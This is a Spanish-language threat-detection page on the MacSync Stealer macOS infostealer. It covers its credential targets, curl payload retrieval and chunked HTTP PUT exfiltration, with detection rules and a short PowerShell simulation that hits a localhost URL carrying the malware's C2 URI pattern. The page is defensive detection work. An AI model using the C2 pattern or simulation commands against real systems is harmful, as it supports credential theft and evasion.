Seguimiento de la Infraestructura de MacSync Stealer con Análisis de Comportamiento
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
MacSync Stealer es un ladrón de información centrado en macOS que depende de una infraestructura de comando y control que rota rápidamente. El malware apunta a datos valiosos, incluidos los contenidos de macOS Keychain, credenciales de navegador, claves SSH y credenciales en la nube. Su cadena de ataque impulsada por scripts combina ingeniería social, recuperación de carga útil a través de curl, y exfiltración de datos fragmentados usando solicitudes HTTP PUT.
Investigación
Los expertos de Microsoft Defender identificaron la amenaza correlacionando comportamientos recurrentes de punto final y red en lugar de depender de indicadores de dominio estáticos. La investigación conectó más de 30 dominios centrándose en pivotes de comportamiento duraderos como rutas URI específicas, cadenas de User-Agent de macOS y parámetros de carga distintivos. Este enfoque permitió a los investigadores rastrear la actividad desde la recuperación inicial de la carga útil hasta la preparación de datos y la exfiltración final.
Mitigación
Las organizaciones deben reducir el riesgo de ejecución del Terminal iniciada por el usuario mediante la concienciación sobre seguridad y controles de plataforma que limiten flujos de trabajo sospechosos de copiar y ejecutar. Proteger los almacenes de credenciales como el Keychain de macOS y los perfiles del navegador del acceso no autorizado es crucial. Monitorizar combinaciones sospechosas de utilidades de macOS y cargas inusuales HTTP PUT también puede ayudar a detectar la exfiltración de datos activa.
Respuesta
Si se detecta actividad de MacSync Stealer, los respondedores deben correlacionar la ejecución sospechosa de shell y AppleScript con la telemetría de red saliente. Los investigadores deben examinar la creación de archivos en ubicaciones temporales como /tmp/ y identificar el acceso no autorizado a archivos sensibles. También se debe revisar la actividad de red en busca de curl solicitudes que contengan identificadores de carga como upload_id, chunk_index, y total_chunks.
Flujo de Ataque
Todavía estamos actualizando esta parte.
Detecciones
Intento de Ejecución Sospechosa de Curl [MacOS] (vía línea de comandos)
Se Creó un Archivo en la Carpeta Temporal de MacOS (vía evento de archivo)
Detección de Patrones de C2 y Exfiltración de Datos de MacSync Stealer [Servidor Web]
Detectar Recuperación de Carga Inicial de MacSync Stealer y Ejecución de AppleScript [Creación de Proceso de Linux]
Ejecución de Simulación
Prerequisito: La Verificación Preliminar de Telemetría y Línea Base debe haber pasado.
Fundamento: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados conducirán a errores de diagnóstico.
-
Narrativa de Ataque y Comandos: Un adversario ha desplegado con éxito el MacSync Stealer en un servidor web objetivo. Habiendo recopilado credenciales e información sensible del sistema, el atacante ahora busca exfiltrar estos datos a su servidor de comando y control (C2). Para mezclarse con el tráfico administrativo estándar y evitar la detección por herramientas basadas en firmas simples, el atacante utiliza
curl.exepara enviar los datos robados. Añaden los parámetros URI maliciosos específicos/dynamic?txd=a la solicitud, que es la firma conocida de la infraestructura de C2 de MacSync. -
Guión de Prueba de Regresión:
# Guión de simulación para activar la regla de detección de C2 de MacSync Stealer # Este comando usa curl para alcanzar un endpoint de C2 simulado con el patrón de URI malicioso. $target_url = "http://127.0.0.1/dynamic?txd=malicious_payload_data" Write-Host "Simulando comunicación de C2 de MacSync Stealer..." curl.exe $target_url -
Comandos de Limpieza:
# No se crean archivos persistentes con esta simulación; # sin embargo, limpia el historial local si es necesario. Clear-History